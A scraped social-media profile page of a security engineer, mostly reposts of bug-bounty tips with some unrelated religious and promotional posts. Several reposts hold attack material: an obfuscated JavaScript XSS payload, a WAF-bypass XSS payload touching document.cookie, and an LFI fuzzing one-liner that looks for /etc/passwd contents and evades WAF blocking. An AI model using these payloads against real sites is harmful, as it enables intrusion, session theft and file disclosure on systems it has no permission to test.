Syntax3r's profile picture. Trader 📈📊 | Security Enthusiast | AppSec Engineer | Nature Lover

Hammad Ul Hassan

@Syntax3r

Trader 📈📊 | Security Enthusiast | AppSec Engineer | Nature Lover

Hammad Ul Hassan أعاد

an XSS payload, Cuneiform-alphabet based 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() #bugbounty #bugbountytips #cybersecurity

viehgroup's tweet image. an XSS payload, Cuneiform-alphabet based

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()

#bugbounty #bugbountytips #cybersecurity

Hammad Ul Hassan أعاد

Day 19 of finding a $100K bug 🐛 in 90 days on @immunefi. Spent the day binging @bountyhunt3rz podcasts on youtube—arguably the best bug hunting podcast out there. The insights from both the host @0xriptide and guests are pure gold! Learned a ton.

PratikSinghML's tweet image. Day 19 of finding a $100K bug 🐛 in 90 days on @immunefi.

Spent the day binging @bountyhunt3rz podcasts on youtube—arguably the best bug hunting podcast out there. The insights from both the host @0xriptide and guests are pure gold! Learned a ton.

Hammad Ul Hassan أعاد

900+ WordPress plugins just casually leak their presence. No bruteforce, no guessing, just a simple request. Wild. Haven't seen anyone using this for recon yet. 🤔 Soon. cc: @leak_ix

Chocapikk_'s tweet image. 900+ WordPress plugins just casually leak their presence.
No bruteforce, no guessing, just a simple request. Wild.
Haven't seen anyone using this for recon yet. 🤔
Soon.

cc: @leak_ix

Hammad Ul Hassan أعاد

Cybersecurity automation with AI/LLMs is starting to become and will be one of the most desired skillsets in the next 3-5 years in all of security.


Hammad Ul Hassan أعاد

Exciting times are ahead with AI making many things possible soon. However, it's crucial to limit the personal data we share online. Stay aware and stay safe!


Hammad Ul Hassan أعاد

Can your current tools cache 10,000 SBOMs transitive dependents in 30 seconds? Minefield can.


Hammad Ul Hassan أعاد

🚨 Guided Hacking Podcast - Episode 1 😎 Interviews with prominent reverse engineers and game hackers, getting to know them and finding out what makes them tick. 🚀 First Episode featuring Zac Canann, the developer of Squally, Squalr & CS420. 👉 youtube.com/watch?v=HilNYg…

GuidedHacking's tweet image. 🚨 Guided Hacking Podcast - Episode 1

😎 Interviews with prominent reverse engineers and game hackers, getting to know them and finding out what makes them tick.

🚀 First Episode featuring Zac Canann, the developer of Squally, Squalr & CS420.

👉 youtube.com/watch?v=HilNYg…

Hammad Ul Hassan أعاد

Subdomain Takeover Detection with Subfinder & Nuclei -new wordpress takeover detection for nuclei template subfinder -d target -o target && nuclei -t wp-xyz-takeover[.]yaml -l target #bugbountytips #bugbounty

gudetama_bf's tweet image. Subdomain Takeover Detection  with Subfinder & Nuclei 

-new wordpress takeover detection for nuclei template

subfinder -d target -o target && nuclei -t wp-xyz-takeover[.]yaml -l target

#bugbountytips #bugbounty
gudetama_bf's tweet image. Subdomain Takeover Detection  with Subfinder & Nuclei 

-new wordpress takeover detection for nuclei template

subfinder -d target -o target && nuclei -t wp-xyz-takeover[.]yaml -l target

#bugbountytips #bugbounty
gudetama_bf's tweet image. Subdomain Takeover Detection  with Subfinder & Nuclei 

-new wordpress takeover detection for nuclei template

subfinder -d target -o target && nuclei -t wp-xyz-takeover[.]yaml -l target

#bugbountytips #bugbounty

Hammad Ul Hassan أعاد

reposts, it will help you❤️🎧🕊️


Hammad Ul Hassan أعاد

Google Dorks - Vulnerable Parameters XSS, Open Redirect, SQLi, SSRF, LFI, RCE 🧵

TakSec's tweet image. Google Dorks - Vulnerable Parameters

XSS, Open Redirect, SQLi, SSRF, LFI, RCE 🧵

Hammad Ul Hassan أعاد

try this amazing LFI oneliner also change ffuf useragent so its dont get blocked by waf's echo site.com | gau | urldedupe -qs | gf lfi |  sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:"" -v; done

coffinxp7's tweet image. try this amazing LFI oneliner also change ffuf useragent so its dont get blocked by waf's
echo site.com | gau | urldedupe -qs | gf lfi |  sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:"" -v; done

Hammad Ul Hassan أعاد

A wonderful tool that combines nuclei, paramspider, NucleiFuzzer, httpx, a good tool for detecting sqli, xss, ssrf, open-redirect.. github.com/0xKayala/Nucle…

Mr_Dark55's tweet image. A wonderful tool that combines nuclei, paramspider, NucleiFuzzer, httpx, a good tool for detecting sqli, xss, ssrf, open-redirect.. 

github.com/0xKayala/Nucle…
Mr_Dark55's tweet image. A wonderful tool that combines nuclei, paramspider, NucleiFuzzer, httpx, a good tool for detecting sqli, xss, ssrf, open-redirect.. 

github.com/0xKayala/Nucle…

Hammad Ul Hassan أعاد

📣 Calling all aspiring cybersecurity professionals!🔒🔐 Want FREE access to top-notch Comptia CYSA+ Study material? 🎓✨ Follow us, like/RT this tweet, and reply with "CyberSHIELD" for a chance to win! 🙌🎉

cyb3rshi3ld's tweet image. 📣 Calling all aspiring cybersecurity professionals!🔒🔐 

Want FREE access to top-notch Comptia CYSA+ Study material? 

🎓✨ Follow us, like/RT this tweet, and reply with "CyberSHIELD" for a chance to win! 🙌🎉

Hammad Ul Hassan أعاد

HOW SURAH AD_DUHA CAN CHANGE YOUR LIFE. 🤍📚 THREAD

Cool_Ustaz's tweet image. HOW SURAH AD_DUHA CAN CHANGE YOUR LIFE. 🤍📚

THREAD

Hammad Ul Hassan أعاد

reposts, it will help you🤎🎧🕊️🥹


Hammad Ul Hassan أعاد

Top 10 Shodan Dorks !

pwn4arn's tweet image. Top 10 Shodan Dorks !

Hammad Ul Hassan أعاد

🤖 STRIDE GPT v0.8 AI-powered threat modeling tool that generates threat models for a given application based on the STRIDE methodology 🆕 New features: * DREAD risk scoring * Auto-generate Gherkin test cases based on identified threats github.com/mrwadams/strid…

clintgibler's tweet image. 🤖 STRIDE GPT v0.8

AI-powered threat modeling tool that generates threat models for a given application based on the STRIDE methodology

🆕 New features:
* DREAD risk scoring
* Auto-generate Gherkin test cases based on identified threats

github.com/mrwadams/strid…

Hammad Ul Hassan أعاد

Amazon WAF Bypass :) <details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">

coffinxp7's tweet image. Amazon WAF Bypass :)

&amp;lt;details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&quot;prompt(document.cookie);&quot;&amp;gt;

Hammad Ul Hassan أعاد

Witnessing some verses from the Qur’an 🥺😍❤️.


Hammad Ul Hassan أعاد

API hacking is NOT very simple ❌ The above statement is true if you do not know where to learn API hacking from. Down below is a list massive API hacking resources (for FREE). Learn, find, report and profit 💰

thebinarybot's tweet image. API hacking is NOT very simple ❌

The above statement is true if you do not know where to learn API hacking from.

Down below is a list massive API hacking resources (for FREE).

Learn, find, report and profit 💰

Loading...

Something went wrong.


Something went wrong.